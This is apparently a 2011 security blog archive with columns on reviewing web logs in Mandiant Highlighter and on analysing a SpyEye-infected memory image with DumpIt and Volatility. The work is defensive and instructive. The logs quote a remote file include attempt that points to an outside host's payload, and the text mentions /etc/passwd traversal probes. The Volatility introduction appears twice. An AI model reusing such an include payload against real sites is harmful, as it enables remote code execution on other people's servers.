The ISSA International Conference is coming up this week in Baltimore; I'll be presenting OWASP Top 10 Tools and Tactics based on work for the InfoSecInstitute article of the same name.

If you're in Baltimore and planning to attend, stop by Friday, October 21 at 2:20pm in Room 304.

I'll be discussing and demonstrating tools such as Burp Suite, Tamper Data, ZAP, Samurai WTF, Watobo, Watcher, Nikto, and others as well as tactics for their use as part of SDL/SDLC best practices.

If you’ve spent any time defending web applications as a security analyst, or perhaps as a developer seeking to adhere to SDLC practices, you have likely utilized or referenced the OWASP Top 10. Intended first as an awareness mechanism, the Top 10 covers the most critical web application security flaws via consensus reached by a global consortium of application security experts. The OWASP Top 10 promotes managing risk in addition to awareness training, application testing, and remediation. To manage such risk, application security practitioners and developers need an appropriate tool kit. This presentation will explore tooling, tactics, analysis, and mitigation.

Hope to see you there.

Cheers.

Saturday, October 15, 2011

Tuesday, October 04, 2011

toolsmith: Log Analysis with Highlighter

Reprinted with permission for the author only from the October 2011 ISSA Journal.

Prerequisites

Windows operating system (32-bit & 64-bit)

.NET Framework (2.0 or greater)

Introduction

Readers may recall coverage of Mandiant tools in prior toolsmiths including Red Curtain in December 2007 and Memoryze with Audit Viewer in February 2009.

Mandiant recently released Highlighter 1.1.3, a log file analysis tool that provides a graphical component to log analysis designed to help the analyst identify patterns. “Highlighter also provides a number of features aimed at providing the analyst with mechanisms to discern relevant data from irrelevant data.”

I’m always interested in enhanced log review methodology and have much log content to test Highlighter on; a variety of discovery scenarios proved out well with Highlighter.

As a free utility designed primarily for security analysts and system administrators, Highlighter offers three views of the log data during analysis:

Text view: allows users to highlight interesting keywords and filter out “known good” content

Graphical, full-content view: shows all content and the full structure of the file, rendered as an image that is dynamically editable through the user interface

Histogram view: displays patterns in the file over time where usage patterns become visually apparent and provide the examiner with useful metadata otherwise not available in other text viewers/editors

I reached out to Jed Mitten, project developer along with Jason Luttgens, for more Highlighter details. Highlighter 1.0 was first released at DC3 in St. Louis in '09 with nearly all features and UI driven by internal (i.e., Mandiant) feedback. That said, for version 1.1.3 they recently got some great help from Mandiant Forum user "youngba", who submitted several bug reports and helped them with one bug fix that they could not reproduce on their own. Jason and Jed work closely to provide a look and feel that is as useful as their free time allows (Highlighter is developed almost exclusively in their off hours).

Nothing better than volunteer projects with strong community support; how better to jointly defend ourselves and those we’re charged with protecting?

Jed describes his use of Highlighter as fairly mundane: he uses it to investigate event logs (Windows events and others), text output from memory dumps (specifically, ASCII output from memory images), and as one of his favorite large-file readers. As a large-file reader Highlighter reads from disk as needed, making it a great tool for viewing multi-hundred-MB files that often choke the likes of Notepad, NP++, and others. I will be candid and disclose that I compared Highlighter against the commercial TextPad.

Another use case for Jed includes using the highlight feature to find an initial malicious IP address in an IIS log, determine the files the attacker is abusing, then discovering additional previously unknown evil-doers by observing the highlight overview pane (on the right).

Jed indicates that the success stories that make him proudest come from other users. He loves teaching a class and having the students tell him how they are using Highlighter, and how they would like to see it evolve. With the user community starting to pick up, Jed considers that a pretty big success as well.

As for the development roadmap, development of Highlighter is very strongly driven by the user community. Both Jason and Jed work a great many hours finding evil (Jason) and wreaking havoc (Jed) in customer systems. As a result, their ability to work on Highlighter does not match their desire to do so. Future hopes for implementation include multi-document highlighting (one highlight set for multiple documents). They would also like to see one of two things happen:

1) Implement binary reading, arbitrary date formats, arbitrary log formats; or

2) Implement/integrate a framework to allow the community to develop such plugins to affect various aspects of Highlighter. Unfortunately, they have big dreams and somewhat less time but they’re very good at responding to Bug Reports at https://forums.mandiant.com.

Finally, Jed stated that they aren't going to open source Highlighter anytime soon but that they do want the user community to drive its development. You heard it here, readers! Help the Mandiant Forums go nuts with bug reports, feature requests, use cases, success stories, etc! They’ve been concerned that it's been difficult to motivate users to submit on the Forum; perhaps users’ work is too sensitive or Highlighter is so simple it doesn't really require a lot of questions and answers, but Jed considers both of those as wins.

Highlighter

Installation is as simple as executing MandiantHighlighter1.1.3.msi and accepting default configuration settings.

Pattern recognition is the fundamental premise at the core of Highlighter use and, as defined by its name, highlights interesting facets of the data while aiding in filtering and reduction.

For this toolsmith I used web logs from the month of August for HolisticInfoSec.org to demonstrate how to reduce 96427 log lines to useful attack types.

Highlighter is designed for use with text files; .log, .txt, and .csv are all consumed readily.

You can opt to copy all of a log file’s content to your clipboard then click File - Import from Clipboard, or choose File - Open - File and select the log file of your choosing. Highlighter also works well with documents created by Mandiant Intelligent Response (MIR); users of that commercial offering may also find Highlighter useful.

Once the log file is loaded, right-click context menus become your primary functionality drivers for Highlighter use. Keep in mind that, once installed, the Highlighter User Guide PDF is included under Mandiant - Highlighter in the Start menu.

HolisticInfoSec.org logs exhibit all the expected web application attack attempts in living color (Highlighter pun intended); we’ll bring them all to light (rimshot sound effect) here.

Remote File Include (RFI) attacks

I’ve spent a fair bit of time analyzing RFI attacks such that I am aware of common include file names utilized by attackers during attempted insertions on my site.

A common example is fx29id1.txt and a typical log entry follows:

85.25.84.200 - - [14/Aug/2011:20:30:13 -0600] "GET ////////accounts/inc/include.php?language=0&lang_settings[0][1]=http://203.157.161.13//appserv/fx29id1.txt? HTTP/1.1" 404 2476 "-" "Mozilla/5.0"



With holisticinfosec.org-Aug-2011.log loaded, I dropped fx29id1.txt in the keyword search field.

Eight lines were detected; I used the graphical view to scroll and align the text view with highlighted results as seen in Figure 1.

FIGURE 1: Highlighted RFI keyword

Reviewing each of the eight entries confirmed the fact that the RFI attempts were unsuccessful as a 404 code was logged with each entry.
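For readers who want to script the same check outside of Highlighter, here is a minimal Python sketch of the idea: parse each entry, keep those whose request contains the include file name, and confirm every hit logged a 404. The regular expression and the function name `find_keyword_hits` are my own assumptions for illustration; the pattern is written against the single sample entry shown above and may need adjusting for other log formats.

```python
import re

# Assumed pattern for the Apache-style entry shown above:
# client IP, two ignored fields, [timestamp], "request", status, size.
LOG_PATTERN = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

def find_keyword_hits(lines, keyword):
    """Return (ip, status, request) for each parsed line whose request contains keyword."""
    hits = []
    for line in lines:
        match = LOG_PATTERN.match(line)
        if match and keyword in match.group("request"):
            hits.append(
                (match.group("ip"), int(match.group("status")), match.group("request"))
            )
    return hits

# The sample entry from the log excerpt above.
sample = [
    '85.25.84.200 - - [14/Aug/2011:20:30:13 -0600] "GET ////////accounts/inc/'
    'include.php?language=0&lang_settings[0][1]=http://203.157.161.13//appserv/'
    'fx29id1.txt? HTTP/1.1" 404 2476 "-" "Mozilla/5.0"',
]

hits = find_keyword_hits(sample, "fx29id1.txt")
# True only if every matching request was answered with a 404.
all_failed = all(status == 404 for _, status, _ in hits)
source_ips = sorted({ip for ip, _, _ in hits})
print(len(hits), all_failed, source_ips)
```

Collecting the distinct source IPs from the hits is a natural next step, since that list is what feeds a Show Only style pivot.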

I also took note of the fact that all eight entries originated from 85.25.84.200. I highlighted 85.25.84.200 and right-clicked and selected Show Only. The result limited my view to only entries including 85.25.84.200, 15 entries in total. As Jed indicated above, I quickly discovered not only other malfeasance from 85.25.84.200, but other similar attack patterns from other IPs.



I right-clicked again, selected Field Operations - Set Delimiter then clicked Pre-Defined - ApacheLog. A final right-click thereafter to select Field Operations - Parse Date/Time resulted in the histogram seen in Figure 2.

FIGURE 2: Histogram showing Events Over Time
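The events-over-time idea can be approximated in a few lines of Python. This is only a sketch and not how Highlighter builds its histogram: I assume the timestamp is the first bracketed field and follows the `14/Aug/2011:20:30:13 -0600` layout from the sample entry, and I bucket by hour. The function name `events_per_hour` and the shortened sample lines are hypothetical.

```python
import re
from collections import Counter
from datetime import datetime

# Assumption: the first [...] field on each line is the timestamp.
TIMESTAMP = re.compile(r'\[([^\]]+)\]')

def events_per_hour(lines):
    """Count log entries per hour, keyed by 'YYYY-MM-DD HH:00'."""
    counts = Counter()
    for line in lines:
        match = TIMESTAMP.search(line)
        if not match:
            continue  # skip lines without a bracketed timestamp
        stamp = datetime.strptime(match.group(1), "%d/%b/%Y:%H:%M:%S %z")
        counts[stamp.strftime("%Y-%m-%d %H:00")] += 1
    return counts

# Hypothetical, shortened entries in the same layout as the sample log line.
lines = [
    '85.25.84.200 - - [14/Aug/2011:20:30:13 -0600] "GET /a HTTP/1.1" 404 2476',
    '85.25.84.200 - - [14/Aug/2011:20:45:02 -0600] "GET /b HTTP/1.1" 404 2476',
    '85.25.84.200 - - [14/Aug/2011:21:05:40 -0600] "GET /c HTTP/1.1" 404 2476',
]

counts = events_per_hour(lines)
for hour in sorted(counts):
    # One '#' per event gives a crude text histogram.
    print(hour, "#" * counts[hour])
```

Hourly buckets are an arbitrary choice here; changing the `strftime` format to drop the hour would give a per-day view instead.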

If you wish to leave fields highlighted while then tagging another for correlation, be sure to check the Cumulative checkbox at the top toolbar. Additionally, to jump to a highlighted field, though only for the most recent set of highlights, you can use the 'n' hotkey for next and 'p' hotkey for previous. Hotkeys can be reviewed via File - Edit Hotkeys and are well defined in the user guide. I recommend reading said user guide rather than, as I did, asking the project lead thick-headed questions for which the answers are painfully obvious. ;-)



If you wish to manage highlights, perhaps remove one of a set of cumulative highlights, right-click in the text UI, choose Highlights - Manage, then check the highlight you wish to remove as seen in Figure 3.

FIGURE 3: Highlighter Manager

Directory Traversal



I ran quick, simple checks for cross-site scripting and SQL injection in my logs via keyword searches such as script, select, union, onmouseover, etc. and ironically found none. Must have been a slow month. But of 96427 log entries for August I did find 10 directory traversal attempts specific to the keyword search /etc/passwd. I realize this is a limiting query in and of itself (there are endless other target opportunities) but it proves the point.

To ensure that none were successful I cleared all highlights, manually highlighted /etc/passwd from one of the initially discovered entries, then clicked Highlight. I then right-clicked one of the highlighted lines and selected Show Only. The UI reduced the view down to only the expected 10 results. I then selected 404 with a swipe of the mouse, hit Highlight again and confirmed that all 10 entries exhibited 404s only. Phew, no successful attempts.
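A keyword sweep like the one described above is easy to sketch in Python. The keyword list comes straight from the searches I mentioned; the function name `keyword_sweep` and the two sample lines (using documentation-range IP addresses) are hypothetical. Note that this is plain substring matching, so a word like "description" would count as a hit for script; treat the counts as leads to review, not verdicts.

```python
from collections import Counter

# Keywords taken from the searches described above.
KEYWORDS = ["script", "select", "union", "onmouseover", "/etc/passwd"]

def keyword_sweep(lines, keywords=KEYWORDS):
    """Count how many lines contain each keyword (case-insensitive substring match)."""
    counts = Counter({keyword: 0 for keyword in keywords})
    for line in lines:
        lowered = line.lower()
        for keyword in keywords:
            if keyword in lowered:
                counts[keyword] += 1
    return counts

# Hypothetical entries for illustration only.
sample_lines = [
    '192.0.2.10 - - [01/Aug/2011:00:00:01 -0600] '
    '"GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 2476',
    '192.0.2.11 - - [01/Aug/2011:00:00:02 -0600] "GET /index.html HTTP/1.1" 200 5120',
]

sweep = keyword_sweep(sample_lines)
for keyword in KEYWORDS:
    print(keyword, sweep[keyword])
```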

FIGURE 4: Highlighter query reduction

There are some feature enhancements I’d definitely like to see added, such as a wrap lines option built into the text view; I submitted the same to the forum for review. Please do so as well if you have feature requests or bug reports.

As a final test to validate Jed’s claim as to large file handling as a Highlighter strong suit, I loaded a 2.44GB Swatch log file. It took a little time to load and format (to be expected), but Highlighter handled 24,502,412 log entries admirably (no choking). I threw a query for a specific inode at it and Highlighter tagged 1930 hits across 25 million+ lines in ten minutes. Nice.
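The read-from-disk-as-needed approach is what keeps large files manageable, and the same principle applies if you script a search yourself. The sketch below is not Highlighter's implementation; it simply iterates over a file one line at a time so memory use stays flat regardless of file size. The function name `count_hits`, the search string, and the generated demo file are all hypothetical.

```python
import os
import tempfile

def count_hits(path, needle):
    """Stream a file line by line; return (matching lines, total lines)."""
    hits = 0
    total = 0
    # errors="replace" keeps the scan going if the log has odd bytes in it.
    with open(path, "r", encoding="utf-8", errors="replace") as handle:
        for line in handle:  # the file object yields one line at a time
            total += 1
            if needle in line:
                hits += 1
    return hits, total

# Build a small stand-in log so the example is self-contained.
with tempfile.NamedTemporaryFile("w", suffix=".log", delete=False) as demo:
    for i in range(1000):
        if i % 100 == 0:
            demo.write("event %d inode=4242\n" % i)
        else:
            demo.write("event %d\n" % i)
    demo_path = demo.name

hits, total = count_hits(demo_path, "inode=4242")
os.remove(demo_path)
print(hits, total)
```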

In Conclusion

Highlighter is clearly improving and is definitely a useful tool for optimizing signal to noise in log files on which you’re conducting analysis activity. It should come as no surprise that the folks from Mandiant have produced yet another highly useful yet free tool for community use. Once again, well done.

Ping me via email if you have questions (russ at holisticinfosec dot org).

Cheers…until next month.

Acknowledgements

Jed Mitten, Highlighter project developer

Sunday, September 04, 2011

toolsmith: Memory Analysis with DumpIt and Volatility

Sept. 11, 2001: “To honor those whose lives were lost, their families, and all who sacrifice that we may live in freedom. We will never forget.“

Reprinted with permission for the author only from the September 2011 ISSA Journal

Prerequisites

SIFT 2.1 if you’d like a forensics-focused virtual machine with Volatility ready to go

Python version 2.6 or higher on Windows, Linux, or Mac OS X

Some plugins require third party libraries

Introduction

Two recent releases give cause for celebration and discussion in toolsmith. First, in July, Matthieu Suiche of MoonSols released DumpIt for general consumption, a “fusion of win32dd and win64dd in one executable.” Running DumpIt on the target system generates a copy of the physical memory in the current directory. That good news was followed by Ken Pryor’s post on the SANS Computer Forensics Blog (I’m a regular reader, you should be too) mentioning the fact that Volatility 2.0 had been released in time for the Open Memory Forensics Workshop, and that SIFT 2.1 was also available. Coincidence? I think not; Volatility 2.0 is available on SIFT 2.1. Thus, the perfect storm formed, creating the ideal opportunity to discuss the complete life-cycle of memory acquisition and analysis for forensics and incident response. In May 2010, we discussed SIFT 2.0 and mentioned how useful Volatility is, but didn’t give it its due. Always time to make up for our shortcomings, right?

If you aren't already aware of Volatility, “the Volatility Framework is a completely open collection of tools, implemented in Python under the GPL, for the extraction of digital artifacts from volatile memory (RAM) samples.”

One thing I’ve always loved about writing toolsmith is meeting people (virtually or in person) who share the same passion for and dedication to our discipline. Such is the case with the Volatility community.

As always, I reached out to project leads/contributors and benefited from very personal feedback regarding Volatility. Mike Auty and Michael Hale Ligh (MHL) each offered valuable insight you may not glean from the impressive technical documentation available to Volatility users.

Regarding the Volatility roadmap, Mike Auty indicated that the team has an ambitious goal for their next release (which they want to release in 6 months, a big change from their last release). They're hoping to add Linux support (as written by Andrew Case), as well as 64-bit support for Windows (still being written), and a general tidy up for the code base without breaking the API.

MHL offered the following:

“At the Open Memory Forensics Workshop (OMFW) in late July, many of the developers sat on a panel and described what got them involved in the project. Some of us are experts in disk forensics, wanting to extend those skills to memory analysis. Some are experts in forensics for platforms other than Windows (such as Linux, Android, etc.) who were looking for a common platform to integrate code. I personally was looking for new tools that could help me understand the Windows kernel better and make my training course on rootkits more interesting to people already familiar with running live tools such as GMER, IceSword, Rootkit Unhooker, etc. I think the open source nature of the project is inviting to new-comers, and I often refer to the source code as a Python version of the Windows Internals book, since you can really learn a lot about Windows by just looking at how Volatility enumerates evidence.”

Man, does that say it all! Stay with this thinking and consider this additional nugget of Volatility majesty from MHL. In his blog post specific to using Volatility to detect Stuxnet, Stuxnet's Footprint in Memory with Volatility 2.0, he discusses Sysinternals tools side-by-side with artifacts identified with Volatility. MHL is dead on right when he says this may be of “interest your readers, especially those who have never heard of Volatility before, because it builds on something they do know - Sysinternals tools.”

This was an incredibly timely post for me as I read it right on the heels of hosting the venerable Mark Russinovich at the ISSA Puget Sound July chapter meeting where he presented Zero Day Malware Cleaning with the Sysinternals Tools, including live analysis of the infamous Stuxnet virus.

See how this all comes together so nicely?

Read Mark’s three posts on Technet followed immediately by MHL’s post on his MNIN Security Blog, then explore Volatility for yourself; I’ll offer you some SpyEye analysis examples below.

NOTE: MHL was one of the authors of Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code; I’ll let the reviews speak for themselves (there are ten reviews on Amazon and all are 5 stars). I share Harlan’s take on the book and simply recommend that you buy it if this topic interests you.

Some final thoughts from AAron Walters, the principal developer and lead for Volatility:

“We have a hard working development team and it’s appreciated when people recognize the work that is being done. The goal was to build a modular and extendable framework that would allow researchers and practitioners come together and collaborate. As a result, shortening the amount of time it takes to get cutting edge research into the hands of practitioners. We also wanted to encourage and push the technical advancement of the digital forensics field which had frequently lagged behind the offensive community. It's amazing to see how far the project has come since I dropped the initial public release more than 4 years ago. With the great community now supporting the project, there are lot more exciting enhancements in the pipe line...”

DumpIt

Before you can conduct victim system analysis you need to capture memory. Some form of dd, including MoonSols win32dd and win64dd, has been the de facto standard, but the recently released MoonSols DumpIt makes the process incredibly simple.

On a victim system (local or via psexec) running DumpIt is as easy as executing DumpIt.exe from the command-line or Windows Explorer. The raw memory dump will be generated and written to the same directory you’re running DumpIt from; answer yes or no when asked if you wish to continue and that’s all there is to it. A .raw memory image named for the hostname, date, and UTC time will result. DumpIt is ideal for your incident response jump kit; deploy the executable on a USB key or your preferred response media.

Figure 1: Run DumpIt

Painless and simple, yes? I ran DumpIt on a Windows XP SP3 virtual machine that had been freshly compromised with SpyEye (md5: 00B77D6087F00620508303ACD3FD846A), an exercise that resulted in my being swiftly shunted by my DSL provider. Their consumer protection program was kind enough to let me know that “malicious traffic was originating from my account.” Duh, thanks for that, I didn’t know. ;-)

Clearly, it’s time to VPN that traffic out through a cloud node, but I digress.

SpyEye has been in the news again lately with USA Today Tech describing a probable surge in SpyEye attacks due to increased availability and reduced cost from what used to be as much as $10,000 for all the bells and whistles, down to as little as $95 for the latest version. Sounds like a good time for a little SpyEye analysis, yes?

I copied the DumpIt-spawned .raw image from the pwned VM to my shiny new SIFT 2.1 VM and got to work.

Volatility 2.0

So much excellent documentation exists for Volatility; on the Wiki I suggest you immediately read the FAQ, Basic Usage, Command Reference, and Features By Plugin.

As discussed in May 2010’s toolsmith on SIFT 2.0, you can make use of Volatility via PTK, but given that we’ve discussed that methodology already and the fact that there are constraints imposed by the UI, we’re going to drive Volatility from the command line for this effort. My memory image was named HIOMALVM02-20110811-165458.raw by DumpIt; I shortened it to HIOMALVM02.raw for ease of documentation and word space.
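Since DumpIt names the image for the hostname, date, and UTC time, the file name itself carries acquisition metadata worth recording in your case notes. Here is a minimal Python sketch that pulls it apart; the `HOST-YYYYMMDD-HHMMSS.raw` layout is an assumption I am inferring from the one file name above, and `parse_dumpit_name` is a hypothetical helper.

```python
from datetime import datetime, timezone

def parse_dumpit_name(filename):
    """Split an assumed HOST-YYYYMMDD-HHMMSS.raw name into (host, UTC datetime)."""
    stem = filename.rsplit(".", 1)[0]
    # Split from the right so a hostname containing hyphens stays intact.
    host, date_part, time_part = stem.rsplit("-", 2)
    captured = datetime.strptime(date_part + time_part, "%Y%m%d%H%M%S")
    return host, captured.replace(tzinfo=timezone.utc)

host, captured = parse_dumpit_name("HIOMALVM02-20110811-165458.raw")
print(host, captured.isoformat())
```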

I executed vol.py imageinfo -f HIOMALVM02.raw to confirm just that, image information. This plugin provided PAE (physical address extension) status as well as hex offsets for DTB (Directory Table Base), KDBG (short for _KDDEBUGGER_DATA64), KPCR (Kernel Processor Control Region), time stamps and processor counts.

Figure 2: imageinfo plugin results

Windows XP SP3, check.

Runtime analysis of my SpyEye sample gave me a few queryable entities to throw at Volatility for good measure, but we’ll operate here as if the only information we have is a suspicion of system compromise.

It’s always good to see what network connections may have been made.

vol.py --profile=WinXPSP3x86 connscan -f HIOMALVM02.raw

The connscan plugin scans physical memory for connection objects.

Results included:

Interesting: both IPs are in Germany, and my VMs don’t make known good connections to Germany, so let’s build from here.

The PID associated with the second connection to 188.40.138.148 over port 80 is 1512.

The pslist plugin prints active processes by walking the PsActiveProcessHead linked list.

vol.py --profile=WinXPSP3x86 pslist -P -f HIOMALVM02.raw

Use -P to acquire the physical offset for a process, rather than the virtual offset, which is the default.

Results included a number of PPIDs (parent process IDs) that matched the 1512 PID from connscan:

I highlighted the process that jumped out at me given the anomalous time stamp, a 0 thread count and no handles.

Let’s check for additional references to cleansweep.

The pstree plugin prints the process list as a tree so you can visualize the parent/child relationships.

vol.py --profile=WinXPSP3x86 pstree -f HIOMALVM02.raw

Results included the PPID of 1512, and the Pid for cleansweep.

Ah, the victim most likely downloaded cleansweep.exe and executed it via Windows Explorer.
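To make the parent/child reasoning concrete, here is a small Python sketch that groups processes by parent PID and walks the children of a given PID. It is an illustration of the relationship, not Volatility's pstree code. PID 3328 (cleansweep.exe) with PPID 1512 comes from the analysis here; labeling 1512 as explorer.exe follows from the Windows Explorer conclusion above, and its parent PID of 1480 plus the extra child row are hypothetical filler.

```python
from collections import defaultdict

def build_tree(processes):
    """Map each parent PID to a list of its (pid, name) children."""
    children = defaultdict(list)
    for pid, ppid, name in processes:
        children[ppid].append((pid, name))
    return children

def walk(children, pid, depth=0):
    """Return (depth, pid, name) rows for every descendant of pid, depth-first."""
    rows = []
    for child_pid, name in sorted(children.get(pid, [])):
        rows.append((depth, child_pid, name))
        rows.extend(walk(children, child_pid, depth + 1))
    return rows

# (pid, ppid, name) rows; see the lead-in for which values are hypothetical.
processes = [
    (1512, 1480, "explorer.exe"),
    (3328, 1512, "cleansweep.exe"),
    (2044, 1512, "hypothetical.exe"),
]

tree = build_tree(processes)
rows = walk(tree, 1512)
for depth, pid, name in rows:
    print("  " * depth + "%d %s" % (pid, name))
```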

But can we extract actual binaries for analysis via the likes of Virus Total? Of course.

This is where the malware plugins are very helpful. I already know I’m not going to have much luck exploring PID 3328 as it has no threads or open handles. MHL points out that a process such as cleansweep.exe typically can't remain active with 0 threads as a process is simply a container for threads, and it will terminate when the final thread exits. Cleansweep.exe is still in the process list probably because another component of the malware (likely the one that started cleansweep.exe in the first place) never called CloseHandle to properly "clean up." That said, the PPID of 1512 has clearly spawned PID 3328 so let’s explore the PPID with the malfind plugin, which extracts injected DLLs, injected code, unpacker stubs, and API hook trampolines. The malware (malfind) plugins don't come packaged with Volatility, but are in fact a part of the above mentioned Malware Analyst's Cookbook; the latest version can also be downloaded.



vol.py --profile=WinXPSP3x86 -f HIOMALVM02.raw malfind -p 1512 -D output/ yielded PE32 gold as seen in Figure 3.

Figure 3: malfind plugin results
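The Volatility invocations used in this walkthrough all share one shape: vol.py, an optional profile, a plugin name, plugin options, and the image file. If you want to script the sequence, a minimal Python sketch follows. It only builds the argument lists and does not run anything; `build_vol_command` is a hypothetical helper, and it places -f after the plugin options as in the pslist example, whereas the malfind command above places it first.

```python
def build_vol_command(plugin, image, profile=None, extra=()):
    """Build an argument list for a vol.py run using only flags shown in this article."""
    cmd = ["vol.py"]
    if profile:
        cmd.append("--profile=" + profile)
    cmd.append(plugin)
    cmd.extend(extra)           # plugin-specific options such as -P or -p/-D
    cmd.extend(["-f", image])   # the memory image to analyze
    return cmd

IMAGE = "HIOMALVM02.raw"
PROFILE = "WinXPSP3x86"

commands = [
    build_vol_command("imageinfo", IMAGE),
    build_vol_command("connscan", IMAGE, PROFILE),
    build_vol_command("pslist", IMAGE, PROFILE, extra=["-P"]),
    build_vol_command("pstree", IMAGE, PROFILE),
    build_vol_command("malfind", IMAGE, PROFILE, extra=["-p", "1512", "-D", "output/"]),
]

for cmd in commands:
    print(" ".join(cmd))
```

Keeping the commands as lists rather than strings means they can be handed to a process launcher later without worrying about shell quoting.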

Malfind dropped each of the suspicious PE files it discovered to my output directory as .dmp files. I submitted each to Virus Total, and bingo, all three were malicious and identified as SpyEye variants as seen in Figure 4.

Figure 4: PE results from Virus Total
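Before submitting extracted files anywhere, it is worth hashing them so you can search for an existing report first and keep a record of exactly what you pulled from memory. The sketch below is one way to do that in Python, assuming the dumps carry a .dmp extension as described above; `md5_of_file` and `hash_dumps` are hypothetical helpers, and the demo writes a throwaway file rather than a real dump.

```python
import hashlib
import os
import tempfile

def md5_of_file(path, chunk_size=1024 * 1024):
    """Hash a file in chunks so large dumps need not fit in memory."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    # Upper case to match the hash style used earlier in this article.
    return digest.hexdigest().upper()

def hash_dumps(directory, suffix=".dmp"):
    """Return {file name: MD5} for every file in directory ending with suffix."""
    return {
        name: md5_of_file(os.path.join(directory, name))
        for name in sorted(os.listdir(directory))
        if name.endswith(suffix)
    }

# Self-contained demo using a temporary directory in place of output/.
with tempfile.TemporaryDirectory() as output_dir:
    with open(os.path.join(output_dir, "example.dmp"), "wb") as demo:
        demo.write(b"hello")
    with open(os.path.join(output_dir, "notes.txt"), "wb") as other:
        other.write(b"ignored")
    hashes = hash_dumps(output_dir)

for name, value in hashes.items():
    print(name, value)
```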

In essence, we’ve done for ourselves via memory analysis what online services such as Threat Expert will do via runtime analysis. Compare this discussion to the Threat Expert results for the SpyEye sample I used.

There is so much more I could have discussed here, but space is limited and we’ve pinned the VU meter in the red, so go read the Malware Cookbook as well as all the online Volatility resources, and push Volatility to the boundaries of your skill set and imagination. In my case the only limiting factors were constraints on my time and my lack of knowledge. There are few limits imposed on you by Volatility; 64bit and Linux analysis support are pending. Get to it!

In Conclusion

I’ve said it before and I’ll say it again. I love Volatility. Volatility 2.0 makes me squeal with delight and clap my hands like a little kid at the state fair. Oh the indignity of it all, a grown man cackling and clapping when he finds the resident evil via a quick memory image and the glorious volatile memory analysis framework that is Volatility.

An earlier comment from MHL bears repeating here. Volatility source code can be likened to “a Python version of the Windows Internals book, since you can really learn a lot about Windows by just looking at how Volatility enumerates evidence.” Yeah, what he said.

Do you really need any more motivation to explore and use Volatility for yourself?

There’s a great list of samples to grab and play with. Do so and enjoy! As it has for me, this process will likely become inherent to your IR and forensic efforts, perhaps even surpassing other tactics and methods as your preferred, go-to approach.

Ping me via email if you have questions (russ at holisticinfosec dot org).

Cheers…until next month.

Acknowledgements

Mike Auty & Michael Hale Ligh of the Volatility project.

AAron Walters – Volatility lead

Reprinted with permission for the author only from the September 2011 ISSA Journal

Prerequisites

SIFT 2.1 if you’d like a forensics-focused virtual machine with Volatility ready to go

Python version 2.6 or higher on Window, Linux, or Mac OS X

Some plugins require third party libraries

Introduction

Two recent releases give cause for celebration and discussion in toolsmith. First, in July, Matthieu Suiche of MoonSols released DumpIt for general consumption, a “fusion of win32dd and win64dd in one executable.” Running DumpIt on the target system generates a copy of the physical memory in the current directory. That good news was followed by Ken Pryor’s post on the SANS Computer Forensics Blog (I’m a regular reader, you should be too) mentioning the fact that Volatility 2.0 had been released in time for the Open Memory Forensics Workshop, and that SIFT 2.1 was also available. Coincidence? I think not; Volatility 2.0 is available on SIFT 2.1. Thus, the perfect storm formed creating the ideal opportunity to discuss the complete life-cycle of memory acquisition and analysis for forensics and incident response. In May 2010, we discussed SIFT 2.0 and mentioned how useful Volatility is, but didn’t give its due. Always time to make up for our shortcomings, right?

If you aren't already aware of Volatility, “the Volatility Framework is a completely open collection of tools, implemented in Python under the GPL, for the extraction of digital artifacts from volatile memory (RAM) samples.”

One thing I’ve always loved about writing toolsmith is meeting people (virtually or in person) who share the same passion for and dedication to our discipline. Such is the case with the Volatility community.

As always, I reached out to project leads/contributors and benefited from very personal feedback regarding Volatility. Mike Auty and Michael Hale Ligh (MHL) each offered valuable insight you may not glean from the impressive technical documentation available to Volatility users.

Regarding the Volatility roadmap, Mike Auty indicated that the team has an ambitious goal for their next release (which they want to release in 6 months, a big change from their last release). They're hoping to add Linux support (as written by Andrew Case), as well as 64-bit support for Windows (still being written), and a general tidy up for the code base without breaking the API.

MHL offered the following:

“At the Open Memory Forensics Workshop (OMFW) in late July, many of the developers sat on a panel and described what got them involved in the project. Some of us are experts in disk forensics, wanting to extend those skills to memory analysis. Some are experts in forensics for platforms other than Windows (such as Linux, Android, etc.) who were looking for a common platform to integrate code. I personally was looking for new tools that could help me understand the Windows kernel better and make my training course on rootkits more interesting to people already familiar with running live tools such as GMER, IceSword, Rootkit Unhooker, etc. I think the open source nature of the project is inviting to new-comers, and I often refer to the source code as a Python version of the Windows Internals book, since you can really learn a lot about Windows by just looking at how Volatility enumerates evidence.”

Man, does that say it all! Stay with this thinking and consider this additional nugget of Volatility majesty from MHL. In his blog post specific to using Volatility to detect Stuxnet, Stuxnet's Footprint in Memory with Volatility 2.0, he discusses Sysinternals tools side-by-side with artifacts identified with Volatility. MHL is dead on right when he says this may be of “interest your readers, especially those who have never heard of Volatility before, because it builds on something they do know - Sysinternals tools.”

This was an incredibly timely post for me as I read it right on the heels of hosting the venerable Mark Russinovich at the ISSA Puget Sound July chapter meeting where he presented Zero Day Malware Cleaning with the Sysinternals Tools, including live analysis of the infamous Stuxnet virus.

See how this all comes together so nicely?

Read Mark’s three posts on Technet followed immediately by MHL’s post on his MNIN Security Blog, then explore Volatility for yourself; I’ll offer you some SpyEye analysis examples below.

NOTE: MHL was one of the authors of Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code; I’ll let the reviews speak for themselves (there are ten reviews on Amazon and all are 5 stars). I share Harlan’s take on the book and simply recommend that you buy it if this topic interests you.

Some final thoughts from AAron Walters, the principal developer and lead for Volatility:

“We have a hard working development team and it’s appreciated when people recognize the work that is being done. The goal was to build a modular and extendable framework that would allow researchers and practitioners come together and collaborate. As a result, shortening the amount of time it takes to get cutting edge research into the hands of practitioners. We also wanted to encourage and push the technical advancement of the digital forensics field which had frequently lagged behind the offensive community. It's amazing to see how far the project has come since I dropped the initial public release more than 4 years ago. With the great community now supporting the project, there are lot more exciting enhancements in the pipe line...”

DumpIt

Before you can conduct victim system analysis you need to capture memory. Some form of dd, including MoonSols win32dd and win64dd were/are de facto standards but the recently released MoonSols DumpIt makes the process incredibly simple.

